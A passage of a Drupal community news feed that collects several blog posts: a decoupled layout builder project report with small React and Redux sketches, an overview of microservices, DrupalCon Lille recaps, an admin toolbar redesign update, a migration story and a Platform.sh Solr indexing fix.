Create JSON equivalent versions of these routes. Some of these routes will exist to serve information for the decoupled layout builder (e.g. choose block/section) whilst others will exist to perform mutations of the configured layout on the Drupal side.

Out of scope but for future consideration:
  • Configure section
  • Move block

Delivery

We wrote an API specification for the needed endpoints. We didn't need add section, remove section, add block, update block and remove block, as all these are handled client side. We did need additional endpoints for saving, discarding and reverting.

All of these endpoints are implemented, with test coverage in the Decoupled Layout Builder API module

Requirement 5: Create a block discovery mechanism to associate a block plugin with a React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375416 

Create a registry component that can translate block plugin IDs to these components. Allow modules to register a component as a React version of a Drupal Block plugin so the decoupled layout builder knows how to render it.
This will take inspiration from registerBlockType in @wordpress/block

Create a React version of the InlineBlock block plugin as a proof of concept.

Out of scope but for future consideration:
  • Convert other Block plugins to React

Delivery

We wrote a context provider to provide a block registry and a way to pass configuration of this from Drupal to React. We wrote a React implementation of the inline block, which uses formatter and widget components. This component is quite complex as it needs to load entity view and form display configuration from Drupal. We have a working version of the Field block plugin too.
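To illustrate the registry idea (this is a sketch with hypothetical names, not the module's actual API), a context-based lookup from block plugin ID to React component might look like this:

// Sketch of a block registry exposed via React context. Hypothetical names.
import React, { createContext, useContext } from 'react';

const BlockRegistryContext = createContext({});

// Wrap the app and pass in an object of { plugin_id: Component } pairs.
export const BlockRegistryProvider = ({ registry, children }) => (
  <BlockRegistryContext.Provider value={registry}>
    {children}
  </BlockRegistryContext.Provider>
);

// Look up the React component registered for a Drupal block plugin ID.
export const useBlockComponent = (pluginId) => {
  const registry = useContext(BlockRegistryContext);
  return registry[pluginId] ?? null;
};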

Requirement 6: Create a Drupal-rendered block fallback React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375416 (could have)

Create a fallback React block plugin component that can make a request to Drupal for a rendered preview. Extend the persistence layer to add another route for this.

Out of scope but for future consideration:
• Support a legacy configuration form for these blocks as well

Delivery

We ship rendered 'fallback' versions of each block in the API. This saves the individual plugins from needing to make many single requests and ensures the best performance as loading happens once upfront.

Requirement 7: Create a discovery mechanism to associate a widget plugin with a React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375417

Identify a list of initial widget plugins that make sense to convert to React as an initial proof of concept. Create a React version of these widget plugins making use of @wordpress/components.

Create a registry component that can translate widget plugin IDs to these components. Allow modules to register a component as a React version of a Drupal widget plugin so the decoupled layout builder knows how to use it to edit an inline block.

Out of scope but for future consideration:
A React powered media library widget

Delivery

We wrote a context provider to create a widget registry and a way to pass the configuration of this from Drupal to React. We wrote a React implementation of the text area widget, which uses an inline CKEditor for in-place editing with rich formatting. We didn't use WordPress components - more on this below.

Requirement 8: Create a discovery mechanism to associate a formatter plugin with a React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375418 

Identify a list of initial formatter plugins that make sense to convert to React as an initial proof of concept. Create a React version of these formatter plugins.

Create a registry component that can translate formatter plugin IDs to these components. Allow modules to register a component as a React version of a Drupal formatter plugin so the decoupled layout builder knows how to render a preview of an inline block.

Out of scope but for future consideration:
• Devise a way for themes to modify the markup of these components, possibly by registering their own replacements in the registry.

Delivery

We wrote a context provider to create a formatter registry and a way to pass configuration of this from Drupal to React. We wrote a React implementation of the text default and string default plugins.

Requirement 9: React context provider/hooks

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375420 

To allow blocks/layouts/widgets/formatters to access this data without passing down props from each component, create a series of context providers and hooks to allow components to access and update this data.

We can take inspiration from e.g. useBlockProps in @wordpress/block-editor

Delivery

We didn't end up using hooks and context providers for this. Instead, we used Redux Toolkit - a mature state management solution designed for large, complex applications. Various selector functions are made available so components can select state, along with reducers for updating state. The use of Redux means we get things like undo and redo without much effort (more on that later).
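For a flavour of what that looks like (a sketch with a hypothetical state shape, not the module's actual store), a Redux Toolkit slice with a selector might be:

// Sketch of a Redux Toolkit slice for layout state. Hypothetical shape.
import { createSlice } from '@reduxjs/toolkit';

const layoutSlice = createSlice({
  name: 'layout',
  initialState: { sections: [] },
  reducers: {
    // Immer lets us "mutate" the draft state safely inside reducers.
    addSection(state, action) {
      state.sections.push(action.payload);
    },
  },
});

export const { addSection } = layoutSlice.actions;
// Selector: components read state through functions like this.
export const selectSections = (state) => state.layout.sections;
export default layoutSlice.reducer;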

Requirement 10: Layout builder component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375421 

Add a component which manages the following UX behaviours:
  • Adding a section (layout plugin)
  • Adding an inline block
  • Editing an inline block

It is hoped that we can take inspiration from existing open-source components in this space including @wordpress/components and builder.io.

Out of scope but for future consideration:
  • Editing (Configuring) a section
  • Moving a block

Delivery

Here we completed the following:

  • Adding a section
  • Adding a block
  • Editing a block
  • Moving a block
  • Moving a section
  • Configuring a section
  • Configuring a block
  • Viewing an outline of the layout, including support for moving components/sections
  • Saving a layout to Drupal, including autosave

You can try this for yourself in our interactive storybook.

Where to next?

The end of the Pitchburgh funding doesn't mean the end of the road. As we progressed through the project, we were building a backlog of out-of-scope items we discovered. A key aspect of this project was the evaluation of the feasibility of a decoupled layout builder. This work will also feed into the newly announced Page Building Experience initiative as one possible solution.

We tracked all the out-of-scope items in a backlog and have now added issues on Drupal.org for both the npm packages and the Drupal module.

We plan to keep working through these as part of our ongoing commitment to open source. Do you have an interest in helping us? If so, reach out to me in the #layouts channel on Drupal Slack. There's a real mix of technology in use here - not just PHP but React, TypeScript and CSS.

We definitely need some help making the UI look nicer and more closely aligned with the Claro look and feel, as well as the work being done by the Admin UI initiative. If you've been looking for a way to get involved in Drupal contribution without a heavy understanding of Drupal's internals - this might be the ideal place to get started.

Nov 06 2023
Nov 06

Microservices architecture is one of the important software trends of 2023. As the technology grows in popularity, more and more tools and technologies are emerging to serve microservices. In a microservices architecture, an application is represented as a set of loosely coupled services. Each module is a self-contained piece of business functionality with a simple interface. Such independent development simplifies the maintenance of the application. Let's discuss in more detail how this architecture works and its features.

The definition of microservices architecture

A microservices architecture, often referred to simply as microservices or MSA, is a framework for creating a digital product in which the software comprises small, independent services. Each such module is responsible for performing a separate task or achieving a goal; it uses an application programming interface (API) to communicate with other services.

Such an architecture facilitates scaling and allows you to develop software and introduce additional functionality into existing programs quickly.

How do microservices work?

According to the requirements of microservices architecture, the digital product is divided into separate modules. Each service performs a specific function and most often manages its own data store. Application elements can create notifications, log data, interact with the user interface, control client authorization, and perform other types of work.

The concept of microservices gives software developers a more decentralized approach to application development. Specialists can isolate application elements, make adjustments, deploy them as often as they like, and manage them independently. If a digital product is not behaving correctly, experts can determine where the problem occurs, restart the service, change its behaviour, and redeploy it if necessary, without interfering with the other modules.
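As a purely illustrative sketch (the service names are hypothetical), two independent services, each with its own container and data store, might be defined like this in Docker Compose:

# docker-compose.yml (illustrative sketch)
services:
  orders:                          # handles order processing only
    image: example/orders:latest
    depends_on: [orders-db]
  orders-db:
    image: mariadb:10.11           # private data store for the orders service
  invoices:                        # can be updated and redeployed independently
    image: example/invoices:latest
    depends_on: [invoices-db]
  invoices-db:
    image: mariadb:10.11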

What is microservices architecture used for?

In simple terms, a microservices architecture makes it quick and easy to build applications. Significant deployment flexibility, combined with the active use of advanced technologies, shortens the development period. Let's look at the current use cases for the microservices architecture:

  • Information processing: digital products based on a microservices architecture can simultaneously process many requests and large amounts of data.
  • Media content: well-known corporations, e.g., Netflix and Amazon Prime Video, deal with hundreds of thousands of API requests every minute. The various OTT platforms that maintain large media content repositories benefit from adopting this architecture.
  • Financial transactions and invoicing: microservices are helpful for software that processes many financial transactions and generates invoices, where unreliable operation can lead to significant losses for the organization.

Today, Amazon, Netflix, Uber, and Etsy are prime examples of large corporations that have broken apart their monolithic software and transformed it into a microservices architecture. Adopting this approach brought their agility and scalability to a new level.

Importance of microservices architecture in web development

According to a study by Business Research, the global microservices market will grow from $4.44 billion in 2022 to $5.31 billion in 2023, and to $10.86 billion by 2027, an average annual growth rate of 19.6%. Let's talk about why demand for microservices is rising every year.

  • They increase the pace of deployment: each service runs in its own containerized environment, so it can be moved anywhere without breaking its dependencies, which preserves the integrity of the project.
  • They empower developers: because each part of a digital product operates in a separate container, it can be improved and fixed individually. When a mistake occurs, the developer does not need to review the entire codebase, only the individual service.

Microservices are transforming the traditional IT culture of siloed development and operations teams. Such an architecture enables better collaboration and communication within the group, preparing restructured departments for expansion, scalability, and resiliency.

Pros and cons of microservice architecture

The many benefits of microservice architecture motivate organizations to move from a standard monolithic structure to this more modern approach. Let's discuss the main advantages of such a development model.

  1. Independent work of developers: the structure allows several teams of specialists to work in parallel. They can build, test, and deploy their own code, which speeds up iteration.
  2. Agility and speed: when companies build complex monolithic applications, they often find it difficult to modify or update them to meet user requirements. With microservices, experts can quickly test and change the code, tailoring it more closely to the target audience's needs.
  3. Scalability: microservices make software easier to scale, since the architecture is built from small elements that can be versioned independently.
  4. Improved data security: breaking a system into smaller pieces helps protect sensitive information from intrusions originating in other areas. Where parts need to be connected, developers can use secure APIs to join them.

Although microservices have many advantages, they also have disadvantages to keep in mind when adopting the architecture. The main one is the initial investment: while the structure provides savings in the long run, deploying such systems requires significant capital to build a suitable hosting infrastructure with guaranteed security and maintenance. You will also need teams of qualified employees to run the different services.

Challenges of microservices architecture

Developers should be careful when working with microservices, as there are pitfalls that demand close attention. A robust API platform can mitigate these issues so your microservices function correctly. Consider the challenges users most often face:

  • System complexity: a microservices architecture includes many moving parts. As mentioned above, the many dependencies between different modules need to be tested successfully, often with non-standard approaches.
  • Lack of centralized management: MSA permits the use of different frameworks and languages, but there is a risk of accumulating so many technologies that the system becomes difficult to maintain. We recommend setting rules for the whole project to avoid technological sprawl.

Modern API management platforms provide all the necessary management tools. These platforms offer a wide range of functionality, from adding new APIs to analyzing data and resolving security issues, simplifying the complex nature of web products.

Which language is best for microservices?

Microservices are adopted with a variety of frameworks, versions, and tools. Because each service is developed and deployed separately, services are loosely coupled, may belong to different teams, and may therefore be written in different languages. Most often, professionals choose one of the following options:

Java

Java is well suited to microservice architecture thanks to its easy-to-read annotation syntax, which simplifies the development of Java microservices in certain frameworks. That readability is especially valuable when working with complex systems.

Golang

If you plan to improve an existing project, consider Golang. The language's popularity stems from its concurrency model and its support for the APIs that matter in a microservices architecture.

Python

Python actively supports integration with various technologies, and prototyping in Python is faster and more convenient than in many other languages and frameworks. Python microservices can also sit alongside systems written in legacy languages such as ASP and PHP, which allows you to generate web service interfaces for interacting with the microservices.

Each of these options has its strengths and weaknesses. You can select any programming language to create a microservices architecture. However, choose a language that suits your project's goals to make the creation process as flexible and efficient as possible.

Microservices vs. monolithic architecture

In a monolithic architecture, all processes are interconnected and run as a single system. As a result, if one part of the system faces a surge in demand, the entire architecture must be scaled. Adding new features or improving old functionality becomes more difficult as the code base grows, and that complexity limits experimentation and prevents the implementation of cutting-edge concepts. If you prefer a monolithic architecture, be prepared for application availability issues as well: with many tightly related processes, a single failure puts all functionality at risk.
A microservices architecture, by contrast, relies on independent elements that run each program process as a service. These services communicate through well-defined interfaces built on simple APIs. Each service delivers a business capability and is responsible for one task, and because services run independently, each can be deployed, scaled, and enhanced to meet the demand for a specific piece of the digital product's functionality.
It is also essential to understand the difference between microservices and service-oriented architecture (SOA). SOA is a software development technique that makes full use of reusable platform elements or services. Service-oriented architecture has an enterprise scope, while microservice architecture is based on the application scope.

Future trends in a microservices architecture

Modern companies are increasingly moving towards a microservices architecture, focusing on the needs of end users in fields such as commerce, medicine, and IT. The active implementation of such structures has given rise to several popular trends that will continue to develop in the future:

  • Adding service meshes to manage microservices: a service mesh is a configurable infrastructure layer for a microservices application. It guarantees controlled, observable, and secure communication between individual modules in the software environment, speeds up the exchange of information, and manages how container services communicate. Experts use this layer to evaluate the connections between different parts of the application, making insights easier to propagate throughout the system. The popularity of the service mesh will grow as more specialists adopt microservice architecture.
  • Serverless architecture: this model removes responsibility for servers from the development team, so experts no longer need to focus on server provisioning, configuration, and maintenance. Under this structure, the cloud provider handles the dynamic allocation and provisioning of servers, making it an optimal fit for cloud workloads. Combining serverless architecture with microservices will create an ideal environment for development and continuous delivery.

Implementing a microservices architecture in an organization requires good technical skills and changes to the company's internal project management systems. All of these trends will shape how microservices work in the future.

Final words

A microservice architecture is best suited to large cloud applications developed by multiple teams of specialists, while a monolithic codebase is optimal for smaller software. Microservices have both advantages and disadvantages: they are easier to develop and maintain, but managing the individual components and preparing for failure takes considerable effort.

Nov 03 2023
Nov 03

We wish you a Merry Christmas and a successful New Year!

We wish you a Merry Christmas, a wonderful holiday, and a happy start to the new year! Enjoy the festive season and get 2024 off to a great start!

drunomics Vienna office, 22 December 2023

Nov 02 2023
Nov 02

Dive into the heart of Drupal GovCon with host Matt Kleve as he captures the energy and insights from attendees who have experienced the conference firsthand. We showcase a mosaic of perspectives that embody the spirit and community of GovCon, bringing you the voices that animate the world of Drupal.

Nov 02 2023
Nov 02

As DrupalCon Europe returned for another year, our team were buzzing to take on the 2023 edition of the annual event, which took place in Lille, the capital of France's Hauts-de-France region.

Going into another year of DrupalCon, the team were particularly excited to meet other members of the Drupal community both new and old, learn more about what the future holds for Drupal, and catch some highly anticipated presentations, as well as one of our team preparing to give their own.

As soon as we entered the event, we were met with an abundance of activity. The building was full of booths as far as we could see, hosted by a range of Drupal contributors. Alongside other Drupal agencies, these included some of the larger names in the community, such as Acquia, as well as organisations that provide some of the most popular tools used in development, such as CKEditor.

DrupalCon

Exploring and Volunteering

While each booth had plenty of attention-grabbing elements - an espresso machine, a claw machine, free stationery and many other interesting features - the booths were also highly educational on topics we were previously less familiar with. Thanks to the organisers, the DrupalCon Europe app was extremely useful in motivating us to visit as many booths as possible and engage with the community. The app also aided the networking side of the event, allowing us to save people's contacts and even suggesting ways to reach out to them after the convention.

A highlight shared by our whole team was the volunteering experience, in which we monitored a total of approximately 20 sessions as a company.

Not only did our volunteering contribute further to Drupal and show support for the event, it was also a fantastic opportunity to network with other volunteers and speakers, creating an instant connection that could not otherwise have been replicated so easily. It was also a refreshing change from the typical form of contribution, which is primarily made through code.

Expanding our Drupal Knowledge through Presentations

A moment that we had been highly anticipating in the weeks leading up to the event was a presentation given by our very own Delivery Manager, Alice Minett, on project first aid. 

Alice

Within this presentation, they were able to contribute to the community by educating others on the best ways to respond, recover and thrive in the face of project failure. With commendable experience leading projects through to launch no matter what disruptions complicated the path to success, Alice was the perfect lead on this topic.

Their presentation ran as smoothly as we had anticipated, and we are extremely proud of Alice for representing Zoocha at DrupalCon. 

In addition to giving our own presentations, we also attended many others throughout the course of the three days. During this time, we were able to witness some inspiring and thought-provoking content which we will be sure to carry with us in our work.

Notably, the annual Driesnote was as fascinating as ever. Dries, Drupal's founder, retold the origin story of Drupal and its buzzing community through a unique allegory. By recounting how Drupal came to be, the journey that made it the global CMS it is today, and the user feedback shaping its direction, Dries introduced new features whose release we are highly anticipating.

Driesnote

Amongst many other interesting presentations, we were introduced to the newly created Drupal Marketing Committee, which extends the success and the work of the Drupal community to a wider audience. Moreover, we had the chance to celebrate women in Drupal and thereby take a step closer to dispelling stereotypes about women in the tech industry.

Furthermore, a particularly admirable keynote was given by Sarah Furness, an ex-RAF helicopter pilot and squadron leader who was the first female helicopter pilot to both fly and lead UK Special Forces in Iraq and Afghanistan. Her authentic and vulnerable approach to leadership, and her acknowledgement that we are all human, were very motivational and powerful.

From a more technical standpoint, our team were able to appreciate and learn from a plethora of more targeted sessions. Team highlights included the problems and resolutions uncovered in performance audits, and collaborative decision-making around project architecture.

Architecture Talk

Trivia Night

DrupalCon would not be complete without the annual Trivia Night, which we had the honour of sponsoring. This was a fantastic way to not only end the week, but also to bring everybody together and socialise with other volunteers and community members in a more casual setting, all while putting our Drupal knowledge to the test.

Trivia Night

A Final Note to the DrupalCon Organisers

At such a fun, educational and sociable event, it is important to credit the organising committee and recognise the sheer amount of planning that went into it. Not only did their work allow all of the attendees to enjoy themselves, it also helped everyone feel comfortable.

One addition in particular that displayed care and support for diversity and inclusivity was the pronoun stickers, which catered to all, allowing people not just to feel accepted but to be proud of their identity. Additionally, it was gratifying to see the colour-coded lanyards and wristbands indicating each person's desired level of social engagement and their willingness to appear in photographs. This was a fantastic yet simple measure that took an extra step to encourage acceptance of those around us.

We would like to thank all members of the organising committee at DrupalCon for putting on such a successful and enjoyable convention. Not only was everybody involved, inspired, and educated, but it was brilliant to see that such measures were taken to make everybody feel included in such a vibrant community.

Nov 01 2023
Nov 01

For Lullabot's first sponsored contribution, we've been focused on improving Drupal's main navigation. We decided on this direction for two reasons. First, it's one of the most visually impactful areas of the Admin UI. Second, its redesign will support other active initiatives to improve Drupal's Admin UI.

Since our last update, we've been focused on a redesign of Drupal's main navigation, or "the toolbar." It's one of the most visually impactful changes to the Drupal Admin UI, and when it's completed, it will complement other efforts like the Dashboard and Field UX initiatives. Our overarching goal is to improve the usability, accessibility, and design of the navigation system to provide a better user experience for site builders and content editors.

We based our initial designs and prototypes on research into competitors, industry standards, and previous UX studies on the topic. We also gathered insights from the admin theme Gin, which helped us validate several hypotheses. At a high level, this suggested a left/top/top layout as the easiest to scale and scan.

Multiple rounds of user testing

We approached this design work by testing, iterating, and testing again. Our goals were to get fast, iterative feedback before jumping into development. Multiple rounds of user testing helped ensure we were going in the right direction. As the saying goes, thirty hours of development time can save you three hours of planning, and we'd rather that be flipped around.

We used a combination of card sorting, surveys, and moderated usability tests to collect feedback, which was used to iterate on the toolbar over several months. We plan to "rinse and repeat" this process until there is a contributed module ready for Drupal Core.

User testing: round 1

An HTML mockup served as the testing ground to gauge user satisfaction. Our first round of testers gave overall positive feedback on the new collapsible, vertical layout. All participants preferred the new navigation over the old, and they also provided valuable insights for iteration.

They got us thinking about the words (Drupalisms) we use and how we might use plain(er) language to reduce onboarding time for less experienced users. As a result, we introduced separate task groups tailored for editors and site builders, enhancing the overall user experience for these specific audiences. The original idea to add these groupings came from discussions years ago and then crystallized into this proposal.

User testing: round 2

Ahead of our second round of testing, we felt optimistic. Our initial prototype was well received, and the menu groups made sense to users.

For round two, David Rosen, a User Experience Analyst from the University of Minnesota, organized a group of experienced Drupal site builders and content editors accustomed to the current toolbar implementation. This group of testers wasn't as enthusiastic about the big change because it meant modifying their current setup.

However, they were able to orient themselves quickly. They completed tasks arranged for them in the testing environment and generally agreed that the new layout could help with onboarding less experienced users.

This round of testing taught us that we'll have to work on the change management and communication strategy to help align more experienced users.

User testing: round 3

During DrupalCon Lille's Contribution Day, we conducted seven pop-up tests to evaluate the mobile implementation of the new toolbar. Participants had varying levels of experience using Drupal Core's admin interface. These in-person tests allowed us to observe how users interacted with the menu on their mobile devices, something that can't be done on a video call.

The mobile testing highlighted users' ability to navigate the admin interface but revealed a few concerns about font size, spacing, and user expectations about the "expand sidebar" feature. So, another round of usability testing is in the works!

Where we are now

Creating a contributed module

On the development side, we've been focused on converting the HTML mockup to a new menu module. We don't want to reinvent the wheel. Instead, we'll try to reuse things that exist in Drupal already, like blocks. We'll provide tools that people already know how to use and customize while also creating a manageable solution for site builders.
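
For readers who haven't built one, the sketch below shows roughly what "reusing blocks" means in Drupal terms: a minimal custom block plugin. The module name, plugin ID, and render output here are hypothetical placeholders, not code from the initiative itself.

<?php

namespace Drupal\example_toolbar\Plugin\Block;

use Drupal\Core\Block\BlockBase;

/**
 * A hypothetical block that could host part of the navigation.
 *
 * @Block(
 *   id = "example_toolbar_menu",
 *   admin_label = @Translation("Example toolbar menu"),
 * )
 */
class ExampleToolbarMenuBlock extends BlockBase {

  /**
   * {@inheritdoc}
   */
  public function build() {
    // A real implementation would build a render array from a menu tree;
    // this placeholder only demonstrates the plugin structure.
    return ['#markup' => $this->t('Navigation goes here.')];
  }

}

Because blocks like this can be placed, configured, and themed with tools site builders already know, navigation built on them inherits that flexibility for free.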

When this is complete, we'll start seeking reviews and obtaining approvals from all significant contributors to incorporate it as an experimental module in Drupal Core, hopefully when 10.3 is released.

Exploring a contextual top bar

During this work, we realized the main toolbar doesn't address every requirement we have. For example, space for a contributed module like Environment Indicator or the core module Workspaces must be accounted for. We're looking to contributed modules and Gin to understand how this could be solved.

At the same time, we need to understand the most common customizations website admins apply to provide the best experience for their clients. So, we designed a short survey. It will be distributed to agency website admins responsible for maintaining client websites.

This work will inform our ideas for a sticky, contextual top bar that holds all the extras that users will need based on where they are in the interface. This work is in progress and will soon be available for testing.

Accessibility review

Now that the markup is nearly complete, we are focused on making everything accessible. We've opened an issue in the queue that serves as the parent for the accessibility issues we've collected so far.

What we heard at DrupalCon Lille

The Driesnote at DrupalCon Lille was the first public presentation of the new toolbar to the Drupal community. It was the first time people got a glimpse of what it looks like and how it functions. Attendees were surprised that they could actually help test it during contribution days.

Overall, the new toolbar was well accepted. People appreciated our approach, which emphasized research, usability testing, iteration, and more rounds of usability testing. Combined with feedback from the larger Drupal community, we've made a lot of progress.

Our global community of makers and users create the code, solve the problems, and form the bonds that sustain it.

Drupal.org's Open Web Manifesto

Alongside Cristina Chumillas, a handful of Lullabots from all disciplines, individuals from the Drupal community, Acquia DAT, 1xInternet, and Skilld have been collaborating to improve the admin UI. We are so grateful for how people have self-organized and supported this work. Contact us if you think you would like to contribute, too.

Oct 31 2023
Oct 31


In another Halloween-themed episode of Tag1 Team Talks, Janez Urevc shared a challenging migration story from his past. The project involved transitioning a media organization from an in-house proprietary CMS to Drupal, facing resistance from the existing development team attached to their custom system.

Despite technical hurdles and internal opposition, the migration succeeded through an incremental approach, running both the old and new systems in parallel. Notably, they went live just before a national parliamentary election, handling a surge in traffic without major issues.

However, the project struggled due to team dynamics, internal divisions, and leadership's over-optimism. The internal team and consultants brought in for the migration didn't collaborate well, leading to burnout and the dissolution of both teams.

This story emphasizes the importance of managing user adoption, fostering collaboration, and addressing leadership challenges in migration projects. It serves as a valuable lesson for organizations planning similar transitions.

For more thrilling tech tales in the Halloween series, insights on migration, Drupal, and other topics, stay tuned to our Tag1 Team Talk series.

Please let us know if you have specific migration-related topics you'd like to see us cover. Or, reach out and let us know if we can be an active part of ensuring your migration is a success!



For a transcript of this video, see Transcript: Scary Drupal Migrations with Janez Urevc.


Photo by Anna Sullivan on Unsplash

Oct 31 2023
Oct 31

About the project

The client's website sells equipment for biological labs. The site runs on Drupal and is deployed with the Platform.sh cloud hosting service, to which you can connect various services by registering them in a config file.
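
For readers unfamiliar with Platform.sh, registering a service takes only a few lines of YAML. The snippet below is a minimal sketch of what a Solr service definition can look like; the service name, Solr version, disk size, and core name are illustrative assumptions, not the client's actual configuration.

# .platform/services.yaml - a hypothetical Solr service definition.
searchsolr:
    type: solr:8.4
    disk: 1024
    configuration:
        cores:
            main_core: {}
        endpoints:
            main:
                core: main_core

# .platform.app.yaml (excerpt) - expose the service to the application.
relationships:
    solrsearch: "searchsolr:main"

With the relationship in place, the Drupal site (typically via the Search API Solr module) reads the connection details from the environment at runtime.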

Problem

We created new equipment categories and search filters for the website. For them to take effect and influence the search results, we had to update the search index, which powers searching and sorting of the site's content. However, the Solr search engine server crashed and rebooted when trying to index the six languages the site supports. Search queries crashed it only on the development and staging servers used as demo environments, while everything worked fine on the production server.

Solution

The cause was a limit that Platform.sh sets for demo environments. Platform.sh tech support responded to our requests with, “Your query is too large, so it cannot be stored in memory”. We started removing fields from the index to shorten the query. In the end, we removed the field responsible for the content language, and that made it work. This was enough for the client to approve the changes and bless the deployment to the production server.
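
For sites on Drupal 8 or later that use the Search API module (the usual setup for Solr on Drupal), dropping a field from an index programmatically can look roughly like the sketch below. The index ID and field name are assumptions for illustration - the same change can also be made through the admin UI at Configuration > Search and metadata > Search API.

<?php

// A rough sketch of removing a field from a Search API index, e.g. from
// a hook_update_N() or a drush php:script. 'default_index' and 'langcode'
// are hypothetical names, not the client's actual configuration.

use Drupal\search_api\Entity\Index;

$index = Index::load('default_index');
$index->removeField('langcode');
$index->save();

// Queue the content for reindexing so Solr rebuilds the now-smaller documents.
$index->reindex();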

It took us 20 hours to understand the problem. It took 10 minutes to fix it.
